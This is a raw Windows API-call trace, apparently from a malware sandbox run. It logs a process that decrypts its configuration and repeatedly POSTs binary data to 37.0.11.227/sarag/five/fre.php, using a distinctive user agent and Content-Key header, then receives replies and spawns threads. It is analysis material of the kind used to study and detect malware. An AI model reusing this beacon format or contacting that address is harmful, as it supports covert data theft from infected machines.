0x690000 [0288.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0288.332] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.332] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.332] GetProcessHeap () returned 0x690000 [0288.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0288.332] GetProcessHeap () returned 0x690000 [0288.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.333] send (s=0x944, buf=0x6ad508*, len=242, flags=0) returned 242 [0288.334] send (s=0x944, buf=0x6aba40*, len=159, flags=0) returned 159 [0288.334] GetProcessHeap () returned 0x690000 [0288.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0288.334] recv (in: s=0x944, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0288.410] GetProcessHeap () returned 0x690000 [0288.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0288.410] GetProcessHeap () returned 0x690000 [0288.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0288.422] GetProcessHeap () returned 0x690000 [0288.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0288.423] GetProcessHeap () returned 0x690000 [0288.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0288.424] closesocket (s=0x944) returned 0 [0288.425] GetProcessHeap () returned 0x690000 [0288.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0288.425] GetProcessHeap () returned 0x690000 [0288.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.425] GetProcessHeap () returned 0x690000 [0288.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0288.426] GetProcessHeap () returned 0x690000 [0288.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0288.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17a8) returned 0x944 [0288.428] Sleep (dwMilliseconds=0xea60) [0288.429] GetProcessHeap () returned 0x690000 [0288.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0288.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0288.441] GetProcessHeap () returned 0x690000 [0288.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0288.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.442] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.443] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.445] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.445] GetProcessHeap () returned 0x690000 [0288.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0288.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.446] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0288.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.447] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.448] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0288.448] GetProcessHeap () returned 0x690000 [0288.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0288.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.450] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.451] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.452] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.453] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.453] GetProcessHeap () returned 0x690000 [0288.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0288.453] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.453] GetProcessHeap () returned 0x690000 [0288.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0288.462] GetProcessHeap () returned 0x690000 [0288.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.462] GetProcessHeap () returned 0x690000 [0288.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0288.462] GetProcessHeap () returned 0x690000 [0288.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0288.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0288.474] GetProcessHeap () returned 0x690000 [0288.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0288.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.475] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.476] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.477] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.477] GetProcessHeap () returned 0x690000 [0288.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0288.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.478] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0288.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.479] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.480] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0288.480] GetProcessHeap () returned 0x690000 [0288.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0288.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.481] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0288.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.482] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0288.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.483] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0288.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.483] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0288.483] GetProcessHeap () returned 0x690000 [0288.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0288.484] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0288.484] GetProcessHeap () returned 0x690000 [0288.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0288.484] socket (af=2, type=1, protocol=6) returned 0x948 [0288.484] connect (s=0x948, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0288.514] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0288.514] GetProcessHeap () returned 0x690000 [0288.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0288.514] GetProcessHeap () returned 0x690000 [0288.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0288.514] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.515] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.515] GetProcessHeap () returned 0x690000 [0288.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0288.515] GetProcessHeap () returned 0x690000 [0288.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.516] GetProcessHeap () returned 0x690000 [0288.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0288.516] GetProcessHeap () returned 0x690000 [0288.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0288.517] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.517] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.517] GetProcessHeap () returned 0x690000 [0288.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0288.517] GetProcessHeap () returned 0x690000 [0288.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.518] send (s=0x948, buf=0x6ad508*, len=242, flags=0) returned 242 [0288.518] send (s=0x948, buf=0x6aba40*, len=159, flags=0) returned 159 [0288.519] GetProcessHeap () returned 0x690000 [0288.519] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0288.519] recv (in: s=0x948, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0288.607] GetProcessHeap () returned 0x690000 [0288.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0288.608] GetProcessHeap () returned 0x690000 [0288.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0288.608] GetProcessHeap () returned 0x690000 [0288.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0288.609] GetProcessHeap () returned 0x690000 [0288.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0288.609] closesocket (s=0x948) returned 0 [0288.610] GetProcessHeap () returned 0x690000 [0288.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0288.610] GetProcessHeap () returned 0x690000 [0288.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.610] GetProcessHeap () returned 0x690000 [0288.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0288.611] GetProcessHeap () returned 0x690000 [0288.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0288.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17ac) returned 0x948 [0288.628] Sleep (dwMilliseconds=0xea60) [0288.629] GetProcessHeap () returned 0x690000 [0288.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0288.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.631] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0288.648] GetProcessHeap () returned 0x690000 [0288.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0288.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.649] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.651] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.659] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.659] GetProcessHeap () returned 0x690000 [0288.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0288.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.661] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0288.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.662] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.663] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0288.663] GetProcessHeap () returned 0x690000 [0288.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0288.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.665] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.666] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.667] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.667] GetProcessHeap () returned 0x690000 [0288.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0288.667] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.668] GetProcessHeap () returned 0x690000 [0288.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0288.668] GetProcessHeap () returned 0x690000 [0288.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.668] GetProcessHeap () returned 0x690000 [0288.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0288.669] GetProcessHeap () returned 0x690000 [0288.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0288.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0288.681] GetProcessHeap () returned 0x690000 [0288.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0288.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.682] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.683] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.684] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.684] GetProcessHeap () returned 0x690000 [0288.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0288.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.685] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0288.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.686] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.687] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0288.687] GetProcessHeap () returned 0x690000 [0288.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0288.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.688] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0288.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.689] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0288.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.690] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0288.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.691] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0288.691] GetProcessHeap () returned 0x690000 [0288.691] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0288.691] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0288.691] GetProcessHeap () returned 0x690000 [0288.691] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0288.691] socket (af=2, type=1, protocol=6) returned 0x94c [0288.691] connect (s=0x94c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0288.721] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0288.721] GetProcessHeap () returned 0x690000 [0288.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0288.722] GetProcessHeap () returned 0x690000 [0288.722] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0288.722] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.723] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.723] GetProcessHeap () returned 0x690000 [0288.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0288.723] GetProcessHeap () returned 0x690000 [0288.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.724] GetProcessHeap () returned 0x690000 [0288.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0288.725] GetProcessHeap () returned 0x690000 [0288.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0288.725] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.726] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.726] GetProcessHeap () returned 0x690000 [0288.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0288.726] GetProcessHeap () returned 0x690000 [0288.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.726] send (s=0x94c, buf=0x6ad508*, len=242, flags=0) returned 242 [0288.727] send (s=0x94c, buf=0x6aba40*, len=159, flags=0) returned 159 [0288.727] GetProcessHeap () returned 0x690000 [0288.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0288.727] recv (in: s=0x94c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 